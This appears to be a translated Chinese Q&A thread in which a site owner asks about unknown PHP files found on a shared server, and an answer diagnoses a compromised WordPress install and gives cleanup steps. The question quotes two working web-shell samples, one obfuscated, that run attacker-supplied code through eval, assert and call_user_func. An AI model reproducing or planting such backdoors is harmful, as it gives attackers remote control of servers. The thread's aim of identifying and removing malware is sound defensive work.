这个问题在这里已有答案:
我在共享服务器上有几个网站,并注意到.php文件的大量出现在各种文件夹中,没有一个被我放在那里。
我是一名.NET开发人员,所以除了一个使用WordPress的网站外,我的网站都没有使用PHP。因此,我只能假设服务器已被访问,并且上传了可疑文件。
但是,凭借我对PHP的基本知识,我无法分辨这些文件正在做什么。我希望一些PHP专家可以帮助我。
这是一个样本......
<?php if(key($_GET)=='35')call_user_func($_GET['35'],$_REQUEST['c'],$_REQUEST['d']);
......还有另一个......
<?php
$acnhe="s\x74\x72\x5fr\x65\x70\x6ca\x63e";$admno=$acnhe('f','',"b\x66afsfef6f4f_\x66dfefcfofd\x66e");$acnhe=$admno($acnhe('|','',$_POST['1043f']));$adnmo="\x61ss\145".'rt';@$adnmo($acnhe);@eval($acnhe);
$k=substr("class",2)."ert"; @ $k(${"_PO"."ST"} ['335']);
任何人都可以解释如果/当被召唤时会做什么?
你的wordpress网站已被入侵。很常见的是,WP中未修补的安全漏洞允许用户注入这些类型的文件,这最终会给访问者带来各种麻烦(例如,通过将其重定向到恶意网站)。
您可以安全地删除此文件,您应该尽快删除。
此外,是时候保护WP安装(将核心更新到最新版本)并浏览所有WP的核心php文件并在其中查找类似的字符串(这些恶意攻击有时也允许核心WP文件也被注入)并且干净他们了